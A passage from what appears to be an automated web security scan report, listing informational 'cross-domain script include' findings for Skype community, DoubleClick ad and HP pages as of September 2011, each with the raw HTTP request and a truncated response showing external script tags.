The response dynamically includes the following scripts from other domains:

Request

GET /t5/user/viewprofilepage/user-id/1164 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:46:20 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 47943

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   <link rel="icon" href="h
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/D9C8DA21403635E061002529EDF581BC/lia-scripts-body-min.js"></script>
...[SNIP]...

18.312. http://community.skype.com/t5/user/viewprofilepage/user-id/148  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/user/viewprofilepage/user-id/148

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/user/viewprofilepage/user-id/148 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:46:10 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 116791

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   <link rel="icon" href="/
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/66CED97343337146537202A0FBE20F50/lia-scripts-body-min.js"></script>
...[SNIP]...

18.313. http://community.skype.com/t5/user/viewprofilepage/user-id/165910  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/user/viewprofilepage/user-id/165910

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/user/viewprofilepage/user-id/165910 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:46:10 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 45156

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   <link rel="icon" href="h
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/D9C8DA21403635E061002529EDF581BC/lia-scripts-body-min.js"></script>
...[SNIP]...

18.314. http://community.skype.com/t5/user/viewprofilepage/user-id/165928  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/user/viewprofilepage/user-id/165928

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/user/viewprofilepage/user-id/165928 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:46:12 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 49190

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   <link rel="icon" href="h
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/D9C8DA21403635E061002529EDF581BC/lia-scripts-body-min.js"></script>
...[SNIP]...

18.315. http://community.skype.com/t5/user/viewprofilepage/user-id/165934  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/user/viewprofilepage/user-id/165934

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/user/viewprofilepage/user-id/165934 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:46:11 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 46437

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   <link rel="icon" href="h
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/D9C8DA21403635E061002529EDF581BC/lia-scripts-body-min.js"></script>
...[SNIP]...

18.316. http://community.skype.com/t5/user/viewprofilepage/user-id/165942  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/user/viewprofilepage/user-id/165942

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/user/viewprofilepage/user-id/165942 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:46:11 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 46351

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   <link rel="icon" href="h
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/D9C8DA21403635E061002529EDF581BC/lia-scripts-body-min.js"></script>
...[SNIP]...

18.317. http://community.skype.com/t5/user/viewprofilepage/user-id/165962  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/user/viewprofilepage/user-id/165962

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/user/viewprofilepage/user-id/165962 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:46:14 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 41912

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   <link rel="icon" href="h
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/6141DE8643E58E1BA36A2E83A753DBF6/lia-scripts-body-min.js"></script>
...[SNIP]...

18.318. http://community.skype.com/t5/user/viewprofilepage/user-id/165964  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/user/viewprofilepage/user-id/165964

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/user/viewprofilepage/user-id/165964 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:46:10 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 45023

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   <link rel="icon" href="h
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/D9C8DA21403635E061002529EDF581BC/lia-scripts-body-min.js"></script>
...[SNIP]...

18.319. http://community.skype.com/t5/Đ?ккаŃ?Đ˝Ń?-и-плаŃ?ежи/ct-p/ru_account  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/..............-..-............../ct-p/ru_account

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/..............-..-............../ct-p/ru_account HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:47:27 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 162423

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/A51D2FF9D3602A82D2C7C7DA266FE521/lia-scripts-body-min.js"></script>
...[SNIP]...

18.320. http://community.skype.com/t5/Đ?ополниŃ?елŃ?Đ˝Ń?Đą-Ń?аздел/ct-p/ru_general_board  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/............................-............/ct-p/ru_general_board

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/............................-............/ct-p/ru_general_board HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:47:32 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 140643

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/A51D2FF9D3602A82D2C7C7DA266FE521/lia-scripts-body-min.js"></script>
...[SNIP]...

18.321. http://community.skype.com/t5/ć?Ąć?¬čŞ?/ct-p/jp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/........./ct-p/jp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/........./ct-p/jp HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:47:22 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 135435

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/A51D2FF9D3602A82D2C7C7DA266FE521/lia-scripts-body-min.js"></script>
...[SNIP]...

18.322. http://fls.doubleclick.net/activityi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /activityi;src=2609787;type=skype282;cat=paids084;ord=1;num=1? HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://www.skype.com/intl/en-us/tell-a-friend/?SkypeName=&FriendEmailAddr_1=&FriendEmailAddr_2=&FriendEmailAddr_3=&FriendEmailAddr_4=&FriendEmailAddr_5=&FriendEmailAddr_6=&FriendName_1=&FriendName_2=&FriendName_3=&FriendName_4=&FriendName_5=&FriendName_6=
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: fls.doubleclick.net
Proxy-Connection: Keep-Alive
Cookie: id=22862f3847010064||t=1314119006|et=730|cs=002213fd487350b8c101372f4c

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Sun, 04 Sep 2011 21:13:40 GMT
Expires: Sun, 04 Sep 2011 21:13:40 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
Content-Length: 1894
X-XSS-Protection: 1; mode=block

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><img src="http://med
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- End Quantcast tag --><script type="text/javascript" src="http://pixel.mathtag.com/event/js?mt_id=101515&mt_adid=100287&v1=&v2=&v3=&s1=&s2=&s3="></script>
...[SNIP]...

18.323. https://fls.doubleclick.net/activityi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://fls.doubleclick.net
Path:   /activityi

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /activityi;src=2609787;type=skype282;cat=webre621;ord=1;num=1? HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Cookie: id=22862f3847010064||t=1314119006|et=730|cs=002213fd487350b8c101372f4c
Host: fls.doubleclick.net
Connection: Keep-Alive
Cache-Control: no-cache
Referer: https://login.skype.com/account/signup-form?setlang=en&intsrc=client%7Creg-a%7C0%2F5.5.0.114
Accept-Language: en-US

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Sun, 04 Sep 2011 18:00:24 GMT
Expires: Sun, 04 Sep 2011 18:00:24 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
Content-Length: 1239
X-XSS-Protection: 1; mode=block

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><img src="https://se
...[SNIP]...
</script>
<script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

18.324. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pagead/ads?client=ca-pub-3778324252021022&output=html&h=90&slotname=4666113802&w=728&lmt=1315170849&flash=10.3.183&url=http%3A%2F%2Fwww.wallstreetoasis.com%2Fforums%2Fhoulihan-lokey-exit-opps&dt=1315153058240&bpp=24&shv=r20110824&jsv=r20110719&correlator=1315153058323&frm=4&adk=1284913444&ga_vid=977777772.1315153055&ga_sid=1315153055&ga_hid=2091701793&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=lucida%20grande&dfs=12&biw=1033&bih=910&ref=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3DHoulihan%2BLokey&fu=0&ifi=2&dtd=248&xpc=lHV8mX6WmM&p=http%3A//www.wallstreetoasis.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 04 Sep 2011 16:17:02 GMT
Server: cafe
Cache-Control: private
Content-Length: 4104
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style><!--
a:link { color: #ffffff }a:visited { color: #ffffff }a:hover { color: #ffffff }a:active { color: #ffffff } --></style><script><!--
(function(){window.ss=functio
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/r20110824/r20110719/abg.js"></script>
...[SNIP]...

18.325. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pagead/ads?client=ca-pub-4358676377058562&format=120x240_as&output=html&h=240&w=120&lmt=1315187729&channel=0946045135&ad_type=text_image&color_bg=ffcc99&color_border=ffcc99&color_link=0000FF&color_text=000000&color_url=008000&flash=0&url=http%3A%2F%2Flwn.net%2FArticles%2F456878%2F%23A&dt=1315187730657&bpp=22&shv=r20110824&jsv=r20110719&correlator=1315187732482&frm=4&adk=3061909479&ga_vid=1342941290.1315138581&ga_sid=1315187735&ga_hid=2135885664&ga_fc=1&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=18&u_nmime=96&dff=serif&dfs=16&biw=1053&bih=512&ref=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&fu=0&ifi=1&dtd=3892&xpc=xyHj7Ys8ju&p=http%3A//lwn.net HTTP/1.1
Host: googleads.g.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://lwn.net/Articles/456878/
Cookie: id=229a9504260100ca||t=1312233693|et=730|cs=002213fd4876a8a011eba88ea7

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 05 Sep 2011 01:54:58 GMT
Server: cafe
Cache-Control: private
Content-Length: 9326
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style>a{color:#0000ff}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

18.326. http://h10088.www1.hp.com/cda/gap/display/main/index.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://h10088.www1.hp.com
Path:   /cda/gap/display/main/index.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /cda/gap/display/main/index.jsp?zn=gap&cp=20000-13698-16013_4041_100 HTTP/1.1
Host: h10088.www1.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: proxy-revalidate
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Date: Sun, 04 Sep 2011 16:30:58 GMT
Content-Length: 23777
Connection: close

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">
<head>
<title>
   HP - Graphic Arts - HP Designjet Portfolio</title>
<met
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://welcome.hp-ww.com/country/us/en/js/hpweb_utilities.js"></script>
<script type="text/javascript" language="JavaScript" src="http://welcome.hp-ww.com/js/hpweb_soctag.js"></script>
...[SNIP]...
<!-- Begin METRICS Javascript -->
<script language="JavaScript" type="text/javascript" src="http://welcome.hp-ww.com/cma/segment/ww/ga/metricsGA.js"></script>
...[SNIP]...

18.327. http://h17007.www1.hp.com/us/en/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://h17007.www1.hp.com
Path:   /us/en/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /us/en/ HTTP/1.1
Host: h17007.www1.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 04 Sep 2011 16:30:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 58240


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>HP Networkin
...[SNIP]...
<!-- Setting s_pageName for Omniture -->
